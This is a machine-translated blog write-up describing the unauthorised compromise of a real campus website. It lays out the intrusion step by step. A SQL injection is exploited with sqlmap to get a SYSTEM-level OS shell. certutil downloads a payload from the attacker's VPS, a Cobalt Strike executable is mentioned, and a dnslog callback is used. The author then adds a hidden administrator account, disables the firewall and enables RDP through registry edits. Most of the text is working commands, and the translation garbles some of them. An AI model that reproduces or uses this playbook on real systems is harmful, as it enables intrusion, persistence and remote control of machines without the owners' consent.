Title: Remember the penetration of campus sites without twists and turns

0x01 Introduction

When preparing for the exam, I accidentally clicked on a site on the campus network and stopped reviewing (just draw the sword)

0x02 Penetration process

Test to injection

http://url/newdetail.aspx?id=11999' or 1=1 --

Sqlmap is used directly, and there is no waf (dog head)

Take a look at it casually

python sqlmap.py -u 'http://url/newdetail.aspx?id=119' --batch --dbs

python sqlmap.py -u 'http://url/newdetail.aspx?id=119' --batch -users

DBMSsqlserver 2005

Whoami in windows nt authority system is a built-in system management account

Check the directory chdir

Dir c:\

OS version Microsoft(R) Windows(R) Server 2003, Enterprise Edition

ipconfig

The existence of certutil on the server is equivalent to deciding to test the command

vps

python -m SimpleHTTPServer 80

Call it

ping wt070h.dnslog.cn

certutil.exe -urlcache -split -f http://funny_ip/amazing1x

Discover echo

However, the website path is in Chinese. If you write Trojans, you will be garbled when writing Trojans. I found a solution but failed.

Look at the environment variables

Nmap looked at the port because there was some problem when trying to connect remotely. At first, I didn't know what the reason was, so I planned to take a look.

Try to remotely connect 3389 to create a new user

#Create a new user

net user amazingadmin123 amazing.123456 /add

#Grant permissions

net localgroup Administrators amazingadmin123 /add

#Activate the user

net user amazingadmin123 /active:yes

#Close the firewall

netsh firewall set opmode mode=disable

#Enable default settings netsh firewall reset

Open port 3389 through the registry

echo Windows Registry Editor Version 5.00 3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] 3389.reg

echo 'fDenyTSConnections'=dword:000000000 3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] 3389.reg

echo 'ortNumber'=dword:00000D3D 3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] 3389.reg

echo 'PortNumber'=dword:00000D3D 3389.reg

regedit /s 3389.reg related records

Related records

This process was tried for two or three times in a row but failed, and the reason was not found. The service was turned off. I had to take the exam first and wait for the administrator to turn on the computer.

The website is online on the third day after the exam. Try creating a new user.

It turns out that it is a security policy problem. You cannot use a simple password. Just use a complicated password when creating a new user.

Remote connection️

The configuration is loading.

0x03  Summary

1. Found an injection point on the home page http://url/newdetail.aspx?id=11999' or 1=1 --2. Inject it through SQLMAP, execute the command: sql-shellselect @@version; //Query the database version sql-oswhoami //Discover it as system permissions sql-oschdir //View directory sql-osdir c: //Click the C disk directory sql-ossysteminfo //View system version sql-osipconfig //View system IPsql-oscuertutil //Test whether there is cuertutil Download command 3. Build an HTTP server on VPS python -m SimpleHTTPServer 804. The cs generation exe can be uploaded to the VPS server. 5. Scan the target system open port through NAMP and find that 3389 exists 6. Create a user and add it to administrator permissions, and enable the account and turn off the fireproof function # Create a new user sql-osnet user amazingadmin123 Admin@12$12 /add# Give permissions sql-osnet localgroup Administrators amazingadmin123 /add# Activate the user sql-osnet user amazingadmin123 /active:yes# Close the firewall sql-osnetsh firewall set opmode mode=disable7. Successfully connect remotely through mstsc

Original link: https://xz.aliyun.com/t/9444